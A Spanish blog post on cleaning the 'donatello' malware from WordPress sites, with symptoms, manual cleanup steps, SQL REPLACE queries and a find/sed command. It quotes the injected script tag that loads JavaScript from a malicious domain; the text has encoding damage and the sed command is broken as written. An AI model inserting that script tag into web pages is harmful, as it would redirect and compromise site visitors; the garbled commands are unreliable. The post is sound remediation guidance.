¬ŅQu√© es el malware donatello?

La infecci√≥n del malware donatello ha aparecido recientemente dirigida principalmente a sitios web basados ‚Äč‚Äčen WordPress.

Se sabe que el malware causa redirecciones a dominios maliciosos en WordPress.

Síntomas del malware blackwaterforllows / donatelloflowfirstly

  1. Redirige a dominios maliciosos como blackwaterforllows.ga, donatelloflowfirstly.ga
  2. Archivos desconocidos agregados a archivos centrales de WordPress.
  3. Se agregó código javascript malicioso a cada publicación y página de su blog.

¬ŅC√≥mo eliminar el malware js.donatelloflowfirstly.ga y blackwaterforllows.ga?

Localice el malware: busque carpetas desconocidas en su /public_html y raíz del sistema de archivos.

Deben comprobarse las carpetas con nombres extra√Īos y nombres que empiecen por ‘_t’, ‘_a’, etc.

Eliminación de la carpeta maliciosa: después de realizar una copia de seguridad local (para ponerla en cuarentena con mucho cuidado) de dichas carpetas desconocidas, elimine estas carpetas del sistema de archivos de su sitio web

Encuentre el código JS malicioso: inicie sesión en su base de datos -> busque la tabla wp_options y luego navegue hasta la tabla wp_posts.

Busque donatelloflowfirstly Repita el proceso para blackwaterforllows.

Elimine las instancias con mucho cuidado despu√©s de realizar una copia de seguridad de la base de datos (los √ļltimos pasos pueden ser un poco complicados si no es experto en tecnolog√≠a)

En mi caso uno de mis sitios fue infectado por este malware mediante XSS y la tabla wp_options tenia mas de 120 registros de blackwaterforllows.ga ademas de muchas tablas transient de wordpress.

Ejemplo de código insertado en el header.php de wordpress

Tip para limpiar este codigo malicioso:

find /path/to/your/folder -name ¬ę.js¬Ľ -exec sed -i ¬ęs//ReplaceWithMalwareCode*//n&/g‚ÄĚ ‚Äė{}‚Äô ;

Ejemplo de código insertado en mysql de wordpress

<script src=’https://js.donatelloflowfirstly.ga/statistics.js?n=ns1′ type=’text/javascript’></script>

Tip para eliminar código insertado en mysql 

UPDATE wp_posts SET post_content = (REPLACE (post_content, ¬ę<script src=’https://js.donatelloflowfirstly.ga/statistics.js?n=ns1′ type=’text/javascript’></script>¬Ľ, ¬ę¬Ľ));

Una vez que se hayan limpiado todos los archivos y la base de datos, no olvide purgar la caché del sitio web.

Verifique que su sitio ya no redireccione visitando su sitio web en modo de navegación privada o de incógnito.

Tip 2: para phpmyadmin

UPDATE wp_posts SET post_content = (REPLACE (post_content, ‚Äú<script src=‚Äôhttps://js.donatelloflowfirstly.ga/stat.js?n=ns1′ type=‚Äôtext/javascript‚Äô></script>‚ÄĚ, ‚Äė‚Äô));

Video de como eliminar el Malware blackwaterforllows y donatelloflowfirstly

Valora este artículo para mejorar la calidad de nuestro blog...
(Votos: 1 Promedio: 4)

Deja un comentario